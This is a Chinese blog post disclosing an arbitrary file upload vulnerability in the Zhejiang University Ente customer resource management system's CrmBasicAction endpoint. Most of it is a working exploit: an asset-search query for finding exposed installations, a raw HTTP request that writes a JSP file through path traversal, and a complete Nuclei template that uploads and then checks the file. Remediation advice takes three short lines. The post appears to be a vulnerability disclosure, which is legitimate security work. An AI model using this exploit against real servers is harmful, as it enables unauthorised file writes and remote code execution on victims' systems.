浙大恩特客户资源管理系统 crmbasicaction 接口任意文件上传

最新推荐文章于 2024-06-22 15:26:37 发布
最新推荐文章于 2024-06-22 15:26:37 发布
阅读量368 收藏 8
点赞数 9
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/136041966
版权

该文章由掌控安全学院——1782814368投稿

【产品介绍】

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

【漏洞介绍】

浙大恩特客户资源管理系统 crmbasicaction 任意文件上传攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!

【资产测绘Query】

title="欢迎使用浙大恩特客户资源管理系统"

【产品界面】

【poc】

POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
Content-Length: 267
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=1bx2RNaFAIqMv30qYgvkzL

--1bx2RNaFAIqMv30qYgvkzL
Content-Disposition: form-data; name="file"; filename="../../7tmwo44vzl.jsp"
Content-Type: application/zip


--1bx2RNaFAIqMv30qYgvkzL--

【Nuclei-Poc】

id: zhedaente-entsoft-fileupload-CrmBasicAction

info:
  name: zhedaente-entsoft-fileupload-CrmBasicAction
  author:
  severity: critical


variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
        Connection: close
        Content-Type: multipart/form-data; boundary={{boundary}}
        Accept-Encoding: gzip

        --{{boundary}}
        Content-Disposition: form-data; name="file"; filename="../../{{filename}}.jsp"
        Content-Type: application/zip


        --{{boundary}}--

      - |+
        GET /enterdoc/dao{{filepath}}{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
        Content-Length: 0
        Accept-Encoding: gzip, deflate
        Connection: close

    extractors:
      - type: regex
        name: filepath
        part: body
        internal: true
        group: 1
        regex:
          - '(/\d+/)'


    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(body_2,'12321')"

【验证】

.\nuclei -l 1.txt -t 1.yaml

【修复建议】

1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

zkzq
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
客户资源管理系统CrmBasicAction.entcrm接口存在任意文件漏洞
nnn2188185的博客
01-16 106
客户资源管理系统CrmBasicAction.entcrm接口存在任意文件漏洞
【漏洞复现】客户资源管理系统-crmbasicaction-任意文件
知黑而守白
01-09 481
杭州软信息技术有限公司()提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,隶属江大学国家大学科技园,立足于中国外向型企业的管理软件系统的设计,研发和咨询服务。客户资源管理系统 CrmBasicAction接口权限设置不当,攻击者可以通过利用此漏洞,上恶意文件系统中,可能导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
客户资源管理系统 crmbasicaction 任意文件
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-16 462
客户资源管理系统中的crmbasicaction接口存在安全漏洞,允许攻击者向系统任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
客户资源管理系统crmbasicaction任意文件-新接口
weixin_43167326的博客
01-21 411
客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。该系统CustomerAction.entphone;.js 接口允许攻击者向系统任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。。
客户资源管理系统 CrmBasicAction.entcrm任意文件
Keepb1ue的博客
01-10 1840
客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
客户资源管理系统 fileupload.jsp 任意文件
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-14 300
客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
客户资源管理系统任意文件漏洞复现
0xSec
11-10 1475
客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件漏洞,未经身份认证的攻击者可以上任意后门文件,最终可导致服务器失陷。
【漏洞复现】客户资源管理系统 fileupload.jsp 任意文件漏洞
做自己喜欢的事,并将其发挥到极致!
11-15 808
杭州软信息技术有限公司(简称)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。
外贸客户管理系统使用手册
11-10
外贸客户管理系统,外贸客户管理系统使用手册
软件操作流程样本.doc
12-18
软件操作流程样本.doc 软件操作流程样本是一种外贸软件顾客手册,旨在指导用户快速...该手册涵盖了登入系统、帐号管理、基本设立、邮箱设立和客户跟进等模块,旨在帮助用户快速上手软件,提高工作效率。
Ent animated character 动画角色 游戏树怪模型带动画资源包unitypackage项目
04-15
Ent animated character 动画角色 游戏树怪模型带动画资源包unitypackage项目 支持Unity版本2019.2.18或更高 动画 走 闲置的 空闲时间长 空闲_长_2 攻击 损害 死亡 纹理 512x512 多边形 3093
软件企业市场营销策略研究—以网络科技有限公司为例.doc
11-25
软件企业市场营销策略研究—以网络科技有限公司为例.doc
论文研究-基于I2C的烟雾报警系统接口模块的设计 .pdf
08-15
基于I2C的烟雾报警系统接口模块的设计,李,李冰,本文针对目前烟雾报警器无法有效联网准确输火灾位置的缺点,设计了一种基于I2C协议的总线式串行通信接口。利用I2C串行总线接口
mysqladmin——MySQL Server管理程序(二)
最新发布
u011565038的博客
06-22 1040
mysqladmin是一个命令行工具,用于执行简单的 MySQL 服务器管理任务,如检查服务器的状态、创建和删除数据库、重载权限等。
PostgreSQL源码分析——INSERT
让我思考一下
06-18 512
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
PostgreSQL源码分析——CREATE DATABASE
让我思考一下
06-18 785
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章,数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。
MySQL修改分隔符
2401_83963227的博客
06-18 301
MySQL修改分隔符
windows桌面运维----第七天
2401_83565544的博客
06-19 299
目录 1、运维有哪些方面选择: 2.网络速度慢: 3.无法访问某个网站: 4.无法共享文件或打印机: 5.无法连接VPN:
软件操作流程.doc
04-25
"软件操作流程.doc 是一份详细阐述如何使用外贸软件的用户手册。该软件主要用于管理外贸企业的各项业务流程,包括客户管理、跟进联系、统计分析等多个方面。" 文档首先介绍了快速管理入门,指导用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值